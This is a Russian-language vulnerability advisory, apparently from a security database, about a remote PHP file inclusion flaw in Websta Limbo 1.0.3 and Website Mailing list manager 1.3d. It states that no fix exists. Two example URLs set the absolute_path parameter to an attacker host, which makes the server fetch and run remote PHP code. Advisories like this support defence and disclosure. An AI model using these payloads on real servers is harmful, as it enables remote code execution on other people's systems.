PHP-инклюдинг в Websta Limbo и Mailing list manager

Дата публикации:
14.03.2005
Дата изменения:
17.10.2006
Всего просмотров:
1270
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Websta Limbo 1.0.3, Website Mailing list manager 1.3d

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные команды на уязвимой системе.

Уязвимость существует из-за некорректной обработки входных данных в параметре absolute_path в сценарии index2.php (Limbo) и сценарии inc/initdb.php (Website Mailing list manager). Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный php сценарий на уязвимой системе с привилегиями web сервера. Пример:

http://[target]/[limbo_dir]/index2.php?absolute_path=http://[attacker]
http://[target]/[mailing_dir]/ inc/initdb.php?absolute_path=http://[attacker]

URL производителя: http://www.webinsta.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: PHP including in Website Mailing list manager and Limbo

или введите имя

CAPTCHA